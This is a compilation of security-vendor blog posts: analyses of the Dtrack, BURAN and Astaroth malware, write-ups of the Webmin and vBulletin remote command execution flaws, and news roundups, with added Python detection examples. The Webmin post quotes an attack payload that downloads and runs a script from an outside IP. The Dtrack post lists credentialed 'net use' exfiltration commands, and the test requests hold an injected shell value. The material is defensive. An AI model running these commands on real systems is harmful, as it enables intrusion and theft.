Dtrack RAT targeting a Nuclear Power Plant in India

The SonicWall Capture Labs Threat Research Team have observed variants of the Dtrack Remote Access Trojan in the wild. Although reported as originating from North Korea, the latest variants of Dtrack are reported to be targeting Indian financial institutions and an Indian nuclear power plant. An earlier version of the malware called ATMDtrack was designed to steal data from ATMs in India.

Infection Cycle:

#File 1 – Sha256: 791c59a0d6456ac1d9976fe82dc6b13f3e5980c6cfa2fd9d58a3cc849755

We found that there are 2 encrypted sections in the overlay:

  1. Encrypted code
  2. Encrypted PE file

The routines sub_438F9C() and sub_438FE1() have the same functionality: they decrypt the encrypted code, which in turn decrypts the encrypted PE file. The decrypted code works as a loader for the PE file obtained after decryption.

The actor has either patched all the __SEH_prolog4 and __SEH_epilog4 routines (the structured exception handling prolog and epilog) or manipulated the compiler toolchain at link time.

The SEH prolog and epilog are referenced by almost all statically linked functions. In the static functions below, __SEH_prolog4 has been replaced with FUN_00438f9c:

Original code of statically linked function _onexit():

Patched code:

Below function reads the offset and size from the DOS stub:

The stage 1 encrypted code's location is kept in the DOS stub: offset = 90620 and size = D10.

Encrypted Code:

The algorithm used to decrypt the data is a slightly modified version of RC4:

After decryption (stage 1 code):

This stage 1 code decrypts the encrypted PE file kept in the overlay and acts as a loader that maps the file into memory and executes it. The encrypted PE file's location is also kept in the DOS stub, and the same algorithm is used to decrypt it (sha256: bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364).

#File 2 – SHA: bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364

Upon execution, the sample first collects the following data from the victim’s system:

  • Computer name
  • RegisteredOwner
  • RegisteredOrganization
  • InstallDate
  • MAC Address
  • IP Address

It then creates the following sub-folders and files:

  • %TEMP%\temp
  • %TEMP%\temp\<host IP address>
  • %TEMP%\temp\res.ip [Windows IP configuration information]
  • %TEMP%\temp\task.list [List of active processes]
  • %TEMP%\temp\netstat.res [Display list of TCP connections and the associated PID]
  • %TEMP%\temp\netsh.res [Interface configuration]

The malware copies the files below into “%TEMP%\MSI17f1f.tmp”, then reads “%TEMP%\MSI17f1f.tmp” to retrieve the browser history and saves it into “%TEMP%\temp\browser.his”:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\1hoxsxkh.default\places.sqlite
  • \AppData\Local\Google\Chrome\User Data\Default\History

The malware tries to connect to the IP addresses below:

  • 172.22.22.156
  • 10.2.114.1
  • 172.22.22.5
  • 10.2.4.1

If the malware connects to any of the above IP addresses, it saves the information into “browser.his”:

The malware iterates over the system directories and lists all files into “c.tmp~”. It then moves “c.tmp~” into the password-protected compressed file “c.tmp” with the password “dkwero38oerA^t@#”:

The malware moves the “%TEMP%\temp” directory into the password-protected compressed file “~7AD874E4MT.tmp” with the password “abcd@123”. The “7AD874E4” in the compressed file name is a checksum of the collected information (computer name, RegisteredOwner, RegisteredOrganization, InstallDate and AdaptersInfo):

The malware then executes the commands below in a command shell to upload the collected information to a network share:

  • net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator
  • move /y C:\Users\AppData\Local\Temp\\~7AD874E4MT.tmp \\10.38.1.35\C$\Windows\Temp\MpLogs\
  • net use \\10.38.1.35\C$ /delete
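The sequence above (map an admin share with credentials on the command line, move the staged archive onto it, drop the mapping) lends itself to a process-creation correlation rule. The following Python is an added example, not code from the original post: it scans constructed Sysmon-style process records (host, account, password and path are made up; only the ~<checksum>MT.tmp naming follows the analysis) and reports hosts that received a file over an admin share during a credentialed `net use` session.

```python
import re
from typing import Dict, List, Optional

# Matches a Windows admin share such as \\10.0.0.5\C$ (host, then a drive-letter share).
ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\[A-Za-z]\$", re.IGNORECASE)

# Constructed process-creation records (Sysmon Event ID 1 / Windows 4688 style).
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\192.0.2.10\C$ Passw0rd! /user:EXAMPLE\administrator"},
    {"pid": 4102, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c move /y C:\Users\bob\AppData\Local\Temp\~7AD874E4MT.tmp \\192.0.2.10\C$\Windows\Temp\MpLogs"},
    {"pid": 4105, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\192.0.2.10\C$ /delete"},
    # Benign: an interactive mapping of an ordinary share, no inline credentials.
    {"pid": 5000, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fileserver\public"},
]


def host_of(share: str) -> str:
    """Extract the host part of a UNC admin share (the token after the two leading backslashes)."""
    return share.split("\\")[2]


def parse_net_use(cmdline: str) -> Optional[Dict]:
    """Return details of a `net use` that targets an admin share, else None."""
    toks = cmdline.split()
    if len(toks) < 3 or toks[0].lower() != "net" or toks[1].lower() != "use":
        return None
    share = next((t for t in toks[2:] if ADMIN_SHARE.fullmatch(t)), None)
    if share is None:
        return None
    user = next((t[6:] for t in toks[2:] if t.lower().startswith("/user:")), None)
    # Any bare token besides the share itself is a password passed inline.
    inline_pw = any(t != share and not t.startswith("/") for t in toks[2:])
    return {"share": share, "user": user, "inline_password": inline_pw,
            "delete": any(t.lower() == "/delete" for t in toks[2:])}


def parse_move_to_share(cmdline: str) -> Optional[Dict]:
    """Return the destination if a `move` command writes onto an admin share."""
    toks = cmdline.split()
    lowered = [t.lower() for t in toks]
    if "move" not in lowered:
        return None
    for t in toks[lowered.index("move") + 1:]:
        m = ADMIN_SHARE.match(t)          # destination starts with \\host\X$
        if m:
            return {"share": m.group(0), "dest": t}
    return None


def detect_admin_share_exfil(events: List[Dict]) -> List[Dict]:
    """Correlate net use / move / net use /delete per target host."""
    state: Dict[str, Dict] = {}
    blank = {"mapped": False, "creds": False, "unmapped": False}
    for ev in events:
        nu = parse_net_use(ev["cmdline"])
        if nu:
            st = state.setdefault(host_of(nu["share"]), dict(blank, moved=[]))
            if nu["delete"]:
                st["unmapped"] = True
            else:
                st["mapped"] = True
                st["creds"] = st["creds"] or nu["inline_password"]
            continue
        mv = parse_move_to_share(ev["cmdline"])
        if mv:
            state.setdefault(host_of(mv["share"]), dict(blank, moved=[]))["moved"].append(mv["dest"])
    findings = []
    for host, st in state.items():
        if st["mapped"] and st["moved"]:
            findings.append({"host": host, "files": st["moved"],
                             "inline_credentials": st["creds"],
                             "cleanup_after_copy": st["unmapped"],
                             # 2 = file copied over a mapped admin share; +1 each for inline creds and cleanup
                             "score": 2 + int(st["creds"]) + int(st["unmapped"])})
    return findings


if __name__ == "__main__":
    for f in detect_admin_share_exfil(SAMPLE_EVENTS):
        print(f)
```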


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Dtrack.A (Trojan)
  • GAV: Dtrack.NK (Trojan)
  • GAV: Dtrack.NK_2 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hackers continue to mount attacks on Webmin servers

Webmin servers have been under attack since the major disclosure of a remote code execution vulnerability in August. SonicWall Threat Research Lab continues to observe attempts to exploit this vulnerability in Webmin servers.

Webmin:

With over 3 million downloads per year, Webmin is one of the world’s most popular open-source web-based applications for managing Unix-based systems. It allows a system to be managed remotely through a web GUI. Webmin can be installed on Apple Mac OS X Server, FreeBSD, CentOS, Ubuntu Linux and Solaris platforms, and recent versions can also be installed and run on Windows. Once the product is installed, a web interface is available to administer and manage the system remotely. It helps configure operating system internals such as users, disk quotas, services and configuration files, as well as modify and control open-source applications such as the Apache HTTP Server, PHP and MySQL. It usually listens for connections on port 10000.

Vulnerability | CVE-2019-15107:

Change Passwords is a standard Webmin module which allows the current user to change the password of any user on the system. A password can be changed via an HTTP POST request to password_change.cgi.

A command injection vulnerability exists in the Change Passwords module of Webmin. When password_change.cgi receives a POST request to change a user’s password, it extracts the old HTTP parameter to validate it. If the password specified by old is incorrect, it builds an error string to return to the user. When building this error string, it evaluates the value assigned to old as a shell command using the Perl qx operator, so any shell command assigned to the old parameter is executed indiscriminately. The cause is a backdoor implanted in some versions of the installation package and source code: an artificial backdoor and a typical case of a supply chain attack.

Password mode is set to 0 by default (passwd_mode=0).

When the following authentication option under the Webmin Configuration page is checked, passwd_mode changes to 2 (passwd_mode=2), allowing users to set a new password using the old password.

The vulnerability can be triggered only when passwd_mode is set to 2 on vulnerable versions of Webmin.
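As an added example (not from the original post or from the Webmin project), the following Python turns the two conditions stated above, a version in the 1.882 to 1.921 window and passwd_mode=2, into a check an administrator can run against the contents of /etc/webmin/version and /etc/webmin/miniserv.conf. The sample file contents are constructed.

```python
import re
from typing import Dict, Tuple

VULNERABLE_MIN = (1, 882)   # window stated in the advisory above (SourceForge builds)
VULNERABLE_MAX = (1, 921)
FIXED = (1, 930)            # version administrators are told to update to


def parse_version(text: str) -> Tuple[int, int]:
    """Turn the contents of /etc/webmin/version (e.g. '1.921' plus newline) into a
    comparable tuple. Webmin versions use three digits after the dot, so
    (1, 921) < (1, 930) compares correctly."""
    m = re.match(r"\s*(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised Webmin version string: {text!r}")
    return int(m.group(1)), int(m.group(2))


def parse_miniserv_conf(text: str) -> Dict[str, str]:
    """miniserv.conf is one key=value pair per line (e.g. passwd_mode=0)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def assess(version_text: str, conf_text: str) -> Dict:
    """Report whether the CVE-2019-15107 conditions described above are met.
    The check cannot tell where the build was downloaded from, so a hit in the
    window means 'treat as vulnerable', not proof that the backdoor is present."""
    version = parse_version(version_text)
    mode = parse_miniserv_conf(conf_text).get("passwd_mode", "0")  # 0 is the default
    in_window = VULNERABLE_MIN <= version <= VULNERABLE_MAX
    return {
        "version": version,
        "passwd_mode": mode,
        "in_vulnerable_window": in_window,
        "trigger_condition_enabled": in_window and mode == "2",
        "action": "upgrade to 1.930" if version < FIXED else "none",
    }


# Constructed sample inputs, modelled on the two file formats named above.
SAMPLE_VERSION = "1.921\n"
SAMPLE_CONF = "port=10000\nssl=1\npasswd_mode=2\n"

if __name__ == "__main__":
    print(assess(SAMPLE_VERSION, SAMPLE_CONF))
```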

Exploit:

A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation of this vulnerability could result in arbitrary remote command execution on the target system as the root user.

A recent attempt to exploit this vulnerability was reported by Bad Packets.

In this attempt, the old password is specified as shown below. When the injected shell code gets executed, it downloads and runs the malicious payload on the target system.

cd /tmp;
wget http://185.112.249.188/son.sh -O webmin.exploit;
chmod 777 webmin.exploit;
./webmin.exploit webmin   

Fix:

All Webmin versions from 1.882 to 1.921 downloaded from SourceForge are vulnerable.

According to a Shodan search, Webmin has more than 262,000 public instances available at the time of writing, mostly located in the United States, France, Germany, Canada and the United Kingdom, of which only 90,000 instances are running the latest patched Webmin version, 1.930.

Webmin administrators are advised to update to version 1.930.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • IPS: 14367 Webmin password_change.cgi Remote Command Injection 1
  • IPS: 14368 Webmin password_change.cgi Remote Command Injection 2
  • WAF: 1726 Webmin Unauthenticated Remote Code Execution 

IOC:

SonicWall firewalls have blocked attempts from the following attacker IP addresses.


Cyber Security News & Trends – 10-25-19

This week, SonicWall releases new threat intelligence data, one cybergang poses as a tougher cybergang, and jackpotting ATMs are spreading in the wild.


SonicWall Spotlight

SonicWall: Encrypted Attacks, IoT Malware Surge as Global Malware Volume Dips – SonicWall Blog

  • SonicWall releases new threat intelligence data from SonicWall Capture Labs revealing 7.2 billion malware attacks were launched in the first three quarters of 2019 as well as 151.9 million ransomware attacks, marking 15% and 5% year-over-year declines, respectively. Despite the drop in attacks overall, the figures also show a rise in encrypted and IoT attacks suggesting a larger attempt by cybercriminals to target specific individuals and companies rather than launching very broad attacks.

Spooky Cyber Threats – Ping: A Firewalls.com Podcast Episode 5 – Firewalls.com Podcast

  • SonicWall returns to the Ping podcast, this time Sales Engineer Daniel Kremers appears to discuss cyberthreats with the Firewalls.com team.

Cybersecurity Roundup: Splunk, SonicWall, Bugcrowd, Exabeam – Channel Futures

  • SonicWall CEO Bill Conner is quoted by Channel Futures, explaining the new threat intelligence data. The news is also covered in MSSPAlert and ComputerWeekly.

Cybersecurity News

Ransomware and Data Breaches Linked to Uptick in Fatal Heart Attacks – PBS

  • A disturbing new study has looked at the available data from hospitals that suffered from ransomware attacks and has found a correlation with deaths from heart attacks at the same institutions. The study has found that the time it took for a patient to receive an electrocardiogram increased by as much as 2.7 minutes after a data breach, and this lag remained as high as 2 minutes even after three to four years.

What Is Wrong With Cybersecurity and Why Is It Messing With My Operations? – Forbes Technology Council

  • In the latest Forbes Technology Council post, it is argued that cybersecurity should be seen as a form of warfare. To win the war constant movement, change and adaptation is needed in order to keep up with the cyber arms race.

The NCSC Annual Review 2019 – The National Cyber Security Centre (UK)

  • The NCSC Annual Review 2019 sheds light on some of the work GCHQ has done over the past year, revealing that it handled 658 cyber incidents in the last 12 months and provided support to almost 900 victims of cyberattacks. The report lists Russia, China, Iran and North Korea as hostile states actively targeting the UK with cyberattacks.

A DDoS Gang Is Extorting Businesses Posing as Russian Government Hackers – ZDNet

  • A DDoS gang is trading on the Russian-government linked ransomware group Fancy Bear’s name by launching DDoS attacks and ransom demands, threatening further attacks if the ransom is not paid. The group is in reality not related to the Fancy Bear group.

‘Sensitive US Army Data Exposed by Online Leak’ – BBC News

  • 179 GB of data was made accessible on an unsecured cloud server run by the travel services company Autoclerk. The exposed data includes full names, birth dates, addresses, phone numbers and travel itinerary details of a range of people, including US government and military personnel.

Avast Says Hackers Breached Internal Network Through Compromised VPN Profile – ZDNet

  • Avast has confirmed it suffered a successful cyberattack after disclosing that a hacker attempted to insert malware into their CCleaner software. This is the second time CCleaner has suffered a supply-chain attack, after hackers breached the previous CCleaner owner, Piriform, in 2017.

And Finally:

Malware That Spits Cash out of ATMs Has Spread Across the World – Vice

  • “Jackpotting” malware attacks on ATMs are spreading around the world, with 10 incidents in Germany between February and November 2017 letting hackers walk off with 1.4 million euros. Experts say that 2019 figures suggest the attacks are only increasing.

In Case You Missed It

SonicWall: Encrypted Attacks, IoT Malware Surge as Global Malware Volume Dips

New cyber threat intelligence from SonicWall shows that malware and ransomware attacks have dipped through the third quarter of 2019, but other attack types, including encrypted threats and IoT malware, are spiking in volume.

SonicWall, which blocks an average of 26 million malware attacks globally each day, recorded 7.2 billion malware attacks and 151.9 million ransomware attacks globally through the first three quarters of 2019, marking 15% and 5% year-over-year declines, respectively.

“Historically, the goal for most malware authors was quantity of infections and now we’re seeing attackers focus on fewer higher-value targets where they can spread laterally,” said SonicWall President and CEO Bill Conner in an official announcement. “This shift in tactics has also seen a corresponding rise in the ransom demands, as attackers attempt to make more money from fewer, but higher value, targets like local municipalities and hospitals.”

Encrypted attacks up 58%

Alarmingly, encrypted threats continue to show record volume compared to 2018. Malware attacks over HTTPS (i.e., the TLS and SSL encryption standards) are up 58% year-over-year. Seasonal data, including attacks over holiday shopping seasons, indicates that this number will likely grow through the final quarter of 2019.

Source: SonicWall Capture Labs

Attacks over non-standard ports still a problem

As outlined in the mid-year update to the 2019 SonicWall Cyber Threat Report, malware authors continue to take advantage of unguarded attack vectors, particularly non-standard ports.

While an average of 14% of malware came across non-standard ports through the first three quarters of 2019, attacks across the vector have grown in both the second (20%) and third quarters (17%). SonicWall’s non-standard port data is based on a sample size of more than 275 million malware attacks recorded worldwide through September 2019.

“What the data shows is that cybercriminals are becoming more nuanced, more targeted and savvier in their attacks,” said Conner. “Businesses need to align to create stricter security rules within their organizations to reduce the threats that our researchers are identifying.”

IoT malware volume up again

The Internet of Things (IoT) grew out of an appetite for speed, convenience and hyper-connectivity. But as has been outlined before, this often came at the expense of sound cybersecurity practices.

It was only a matter of time before cybercriminals exploited this apathy.

In 2018, SonicWall Capture Labs recorded 32.7 million IoT malware attacks, a 215.7% year-over-year increase. During the first half of 2019, that number jumped another 55%. Now, through three quarters of 2019, IoT malware attacks have eclipsed 25 million, a 33% year-over-year increase.

2019 Cyber Threat Intelligence & Data from SonicWall

For more 2019 third-quarter cyber threat intelligence, please view the official announcement and explore the SonicWall Capture Security Center for interactive data across different attack vectors and geographical regions.

vBulletin Remote command execution vulnerability

vBulletin is a proprietary Internet forum software. It is written in PHP and uses a MySQL database server. Once installed and configured, the forum is accessible via Hypertext Transfer Protocol (HTTP).

vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request (CVE-2019-16759).

A remote command execution vulnerability exists in vBulletin. An attacker can exploit this vulnerability with a specially crafted HTTP POST request. Authentication is not required, so this is a pre-auth remote command injection. The commands are executed with the same privileges as the vBulletin service, which could result in attackers taking over vulnerable web forums.

Examining the PoC code, we understand that malicious commands can be passed in the widgetConfig[code] parameter, which is then posted via the routestring POST request.

The POST request looks like this:

This is followed by the exploit code.

Some examples of exploits in the wild:

After decoding:

Another example:

After decoding:

In both examples the attacker tries to execute web shell commands.
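Both the Webmin flaw described earlier and this vBulletin flaw are reached through a single HTTP POST parameter, which makes them natural candidates for request inspection at a WAF or IPS. The following Python is an added example, not code from the original post or from SonicWall's signatures: it parses a raw request and applies one rule for Webmin's password_change.cgi (shell metacharacters in `old`, CVE-2019-15107) and one for vBulletin's widget_php renderer (widgetConfig[code] supplied alongside the routestring, CVE-2019-16759). The three sample requests, hostnames and values are constructed.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Characters that let a value break out of the shell context in which the
# backdoored password_change.cgi evaluated `old`. Assumption: a sensible starting
# list for a WAF rule; legitimate passwords containing `$` or `(` need an allow-list.
SHELL_META = re.compile(r"[;|&`$()<>\r\n]")


def parse_request(raw: bytes) -> Dict:
    """Split a raw HTTP/1.1 request into method, path, headers and merged parameters
    (query string plus urlencoded body). Content-Length is not enforced here."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        for key, values in parse_qs(body.decode("latin-1"), keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {"method": method, "path": url.path, "headers": headers, "params": params}


def inspect(req: Dict) -> List[str]:
    """Return the names of the rules the request triggers (empty list if clean)."""
    hits = []
    # Rule 1: Webmin Change Passwords module. Only `old` was evaluated, so only `old` is checked.
    if req["path"].endswith("/password_change.cgi"):
        if any(SHELL_META.search(v) for v in req["params"].get("old", [])):
            hits.append("webmin-password_change-old-shell-meta")
    # Rule 2: vBulletin widget_php renderer with caller-supplied PHP in widgetConfig[code].
    routes = [r.strip("/").lower() for r in req["params"].get("routestring", [])]
    if "ajax/render/widget_php" in routes and "widgetConfig[code]" in req["params"]:
        hits.append("vbulletin-widget_php-widgetConfig-code")
    return hits


# Constructed sample requests.
WEBMIN_ATTACK = (b"POST /password_change.cgi HTTP/1.1\r\n"
                 b"Host: webmin.example.test:10000\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 b"user=root&pam=&expired=2&old=wrong%7Cid&new1=x&new2=x")
WEBMIN_LEGIT = (b"POST /password_change.cgi HTTP/1.1\r\n"
                b"Host: webmin.example.test:10000\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                b"user=alice&pam=&expired=2&old=CorrectHorse9&new1=Battery&new2=Battery")
VBULLETIN_ATTACK = (b"POST /index.php HTTP/1.1\r\n"
                    b"Host: forum.example.test\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    b"routestring=ajax/render/widget_php&widgetConfig%5Bcode%5D=echo+1%3B")

if __name__ == "__main__":
    for sample in (WEBMIN_ATTACK, WEBMIN_LEGIT, VBULLETIN_ATTACK):
        print(inspect(parse_request(sample)))
```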

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • IPS 14453 vBulletin widgetConfig Remote Command Execution 1
  • IPS 3185 Web Application Remote Code Execution 14

IoCs:

  • 182.161.18.135
  • 191.37.220.126
  • 14.231.65.23
  • 129.0.76.131

Threat Graph:

Cyber Security News & Trends – 10-18-19

This week, SonicWall wins at the Computing Security Awards, and the cyberattack that almost took down the 2018 Olympics.


SonicWall Spotlight

SonicWall Wins at the Computing Security Awards

SonicWall Investing in Direct Touch and Channel Skills – ComputingWeekly

  • SonicWall’s Terry Greer-King talks to Computer Weekly about the expansion of SonicWall University among SonicWall partners, and how additional staffing in the direct-touch model has increased growth in the EMEA market.

Nanocore Under the Microscope – Security Boulevard

  • Using work previously published by the SonicWall Threat Labs, Security Boulevard takes a deep dive into the inner workings of the Remote Access Trojan known as NanoCore RAT, currently undergoing a change in delivery methods.

Using EDR for Layered Security – Techradar Pro

  • With the requirement for a layered security approach increasingly becoming public knowledge, SonicWall’s Terry Greer-King argues that the rapidly growing market of Endpoint Detection and Response (EDR) is the best solution. He explains what it is, how it works and why cybersecurity systems need to be multi-faceted and layered to compete in the modern threat landscape.

Cybersecurity News

The Untold Story of the 2018 Olympics Cyberattack, the Most Deceptive Hack in History – Wired

  • Reviewing the 2018 Olympics opening ceremony in South Korea, USA Today wrote that “it’s possible no Olympic Games have ever had so many moving pieces all run on time.” Little did they know that behind the scenes an entire team of cybersecurity experts were fire-fighting a major cyberattack that was working to take the entire Olympics network down.

French TV Station Shrugs Off Ransomware Attack to Keep Running – CBR Online

  • One of France’s largest privately-owned media groups, M6, survived a ransomware attack without disruption to radio or TV. The group praised the “quick and efficient intervention of our cybersecurity experts” for its ability to keep operating during the attack.

Major Airport Malware Attack Shines a Light on OT Security – Threat Post

  • A cryptomining infection that spread rapidly through an unnamed European airport has shined a spotlight on poor cybersecurity practices. Despite being part of a known strain of cryptomining software, the malware had been altered enough to raise no red flags with airport personnel and was active for months before being detected.

Cybersecurity & Data Privacy Trends in 2020 – ITProPortal

  • 5G, cybersecurity budgets, data privacy regulations, staffing problems, Internet of Things; ItProPortal looks to the future and argues that all of these disparate but related trends will converge in 2020.

Sodinokibi Ransomware: Where Attackers’ Money Goes – Dark Reading

  • Researchers investigate the ransomware-as-a-service malware Sodinokibi in an attempt to understand how much money is involved. Factoring in how much money is involved, and who it goes to, they conclude that the operators are making a “fortune,” as much as $86,000 pure profit from a single affiliate in one 72-hour period.

And Finally:

‘Sextortion Botnet Spreads 30,000 Emails an Hour’ – BBC

  • There is an ongoing large-scale “sextortion” campaign making use of more than 450,000 hijacked computers. Sending emails at 30,000 an hour, they threaten to release compromising photographs of the recipient unless $800 is paid in Bitcoin. By using real data gleaned from data breaches the extortion attempt can seem legitimate, but this is a fear-based campaign with the extortioners working from the “rule of big numbers.”

In Case You Missed It

BURAN Ransomware spreading through Javascript

The SonicWall RTDMI™ engine has recently detected a highly obfuscated JavaScript file which delivers BURAN ransomware as its payload. The malware is delivered to the victim’s computer as an archive containing a JavaScript file, as shown below:

This malicious script is obfuscated using the JavaScript obfuscator available at https://obfuscator.io. The script uses the Compact Code, Rotate String Array and String Array encoding (RC4) obfuscations, to name a few.


Fig-1: JavaScript file

After inserting line breaks, one can easily identify the rotation of the string array and the other obfuscation techniques, as shown in the images below.


Fig-2: String Rotation technique used in obfuscation

After string rotation on the array sdisdoihdofoiofidiafgobdoa, the element order is changed as shown below:

As shown above, after rotation the element at index 166 becomes the first element, the element at index 167 becomes the second, and so on.

Elements of this array are further de-obfuscated by Base64 decoding and RC4 decryption. The keys for RC4 decryption are present in the file.
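As an added example (not code from the original post), the following Python reverses the two transformations just described, string-array rotation and Base64-plus-RC4 entry encoding, and its rc4() routine also serves as a reference for the Dtrack analysis earlier on this page, which describes that sample's decryption as a slightly modified RC4 without specifying the modification. The array contents, key and rotation count are constructed.

```python
import base64
from typing import List


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the keystream XOR. The same call
    encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rotate_string_array(arr: List[str], count: int) -> List[str]:
    """Undo the 'Rotate String Array' transform: the element at index `count`
    becomes the first element (166 in the sample discussed above)."""
    if not arr:
        return arr
    count %= len(arr)
    return arr[count:] + arr[:count]


def decode_entry(entry: str, key: str) -> str:
    """Reverse 'String Array encoding: RC4': each entry is base64(rc4(key, text)).
    Assumes the standard base64 alphabet; some builds substitute a custom one."""
    return rc4(key.encode("latin-1"), base64.b64decode(entry)).decode("utf-8")


def deobfuscate(arr: List[str], rotation: int, key: str) -> List[str]:
    """Rotate, then decode every entry, giving the array the script really indexes."""
    return [decode_entry(e, key) for e in rotate_string_array(arr, rotation)]


def encode_entry(text: str, key: str) -> str:
    """Inverse of decode_entry, used only to build the constructed sample below."""
    return base64.b64encode(rc4(key.encode("latin-1"), text.encode("utf-8"))).decode("ascii")


# Constructed sample: five strings, RC4+base64 encoded, then rotated the "wrong"
# way so that a left rotation by SAMPLE_ROTATION restores the original order.
SAMPLE_KEY = "k3y"
SAMPLE_PLAIN = ["WScript.Shell", "MSXML2.XMLHTTP", "ADODB.Stream", "GET", "run"]
SAMPLE_ROTATION = 3
_encoded = [encode_entry(s, SAMPLE_KEY) for s in SAMPLE_PLAIN]
SAMPLE_ARRAY = rotate_string_array(_encoded, len(_encoded) - SAMPLE_ROTATION)

if __name__ == "__main__":
    print(SAMPLE_ARRAY)
    print(deobfuscate(SAMPLE_ARRAY, SAMPLE_ROTATION, SAMPLE_KEY))
```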


Fig-3: Base64 decoding

Fig-4: RC4 decryption

As shown below, the de-obfuscated code downloads and executes the payload:

Payload Analysis:

At present, the payload being distributed belongs to the BURAN ransomware family.

Infection Cycle:

The malware creates a copy of itself as %appdata%\Microsoft\windows\lsass.exe and adds a Run entry for persistence as follows:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • “Local Security Authority Subsystem Service” = %appdata%\Microsoft\Windows\lsass.exe -start

Adds the following Registry key:

  • HKEY_CURRENT_USER\Software\Buran V
    • “Knock” = 0x0000029a

After infection, the malware shows the following ransom note to the victim:

For an encrypted file, the personal ID shown in the ransom note is appended to the filename. For example, the file “notes.txt” is renamed to “notes.txt.[2074D3D3-7546-6D74-A84E-9A1F4AEF44E6]” after encryption.

Network Connections:

Connects to the following domains:

    • http://geoiptool.com
    • http://iplogger.ru/1EMT77.jpg
      • User-Agent : BURAN


Indicators of Compromise:

  • 3b17292dd99059a56a3c06686d217c9ac9b75386501666f0a2141164edbbf2bf  [Archive sha256]
  • ed90f116281e1287fda0e181d768a75614983cd81418f9c6fdb6c1a2fa803489 [Javascript sha256]
  • ef2dfe3cb46bc5c7f9e0a935fbbccc100256cec4063a2e2945731cce540608a6 [Buran Ransomware]


Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Additional Remark:

Please note that the RTDMI™ engine analyzed the samples and returned a verdict of ‘Malicious’ on October 7, 2019 at 15:58 (GMT), as visible in the report:

Whereas the samples were first seen on VirusTotal at later dates and times, as evident from the ‘First Submission’ date:

Astaroth latest variant using Alternate Data Streams (ADS), Living Off The Land techniques and YouTube for hosting content

The SonicWall RTDMI™ engine has recently detected a LNK file inside an archive which delivers the Astaroth Trojan to the victim’s machine. The archive contains a malicious LNK file, as shown below:

The LNK file contains an obfuscated command which uses EXPLORER.EXE to execute malicious JavaScript embedded in a remote Uniform Resource Locator (URL):

The unavailability of the archive file on any of the popular threat intelligence sharing portals, such as VirusTotal and ReversingLabs, indicates its uniqueness and limited distribution:

JavaScript Analysis:

The JavaScript contains 10 different URLs for downloading malicious files. It generates a random number to select a URL from the list; if the selected URL is not active, it generates another random number to select a URL in the next iteration:

The JavaScript creates the directory C:\Users\Public\Libraries\trust and downloads the files below from the selected URL using the Bitsadmin tool:

  • landoqeahjkya.jpg
  • landoqeahjkyb.jpg
  • landoqeahjkyc.jpg
  • landoqeahjkydwwn.gif
  • landoqeahjkydx.gif
  • landoqeahjkyg.gif
  • landoqeahjkygx.gif
  • landoqeahjkyi.gif
  • landoqeahjkyxa.~
  • landoqeahjkyxb.~
  • landoqeahjky64a.dll
  • landoqeahjky64b.dll

The JavaScript immediately moves each downloaded file into an Alternate Data Stream of desktop.ini, except for landoqeahjky64a.dll and landoqeahjky64b.dll.

“An Alternate Data Stream (ADS) is a feature of the New Technology File System (NTFS) in Windows to store metadata for a specific file.”

The Alternate Data Streams of desktop.ini are shown below using the Streams tool:

The JavaScript combines the content of landoqeahjky64a.dll and landoqeahjky64b.dll to construct a valid Dynamic Link Library (DLL) and copies it to the files below:

  • landoqeahjky64.dll
  • mozcrt19.dll
  • mozsqlite3.dll
  • sqlite3.dll

The JavaScript writes “145_MULT1T3SL4S_” to the r1.log file. It uses ExtExport.exe, which is part of Windows Internet Explorer, to load one of the above DLL files. The loaded DLL belongs to the Astaroth malware family:

Astaroth Analysis:

Astaroth is an information stealer which has primarily affected Brazilian citizens since 2018. This malware is prominently known for using Living Off The Land tactics to stay invisible to security software.

Once landoqeahjky64.dll is loaded by ExtExport.exe, it combines the content of landoqeahjkyxa.~ and landoqeahjkyxb.~ to construct a valid DLL. The malware uses process hollowing to load the constructed DLL in memory.

The malware checks the default language of the system. If the default language is not Portuguese, the malware terminates immediately:

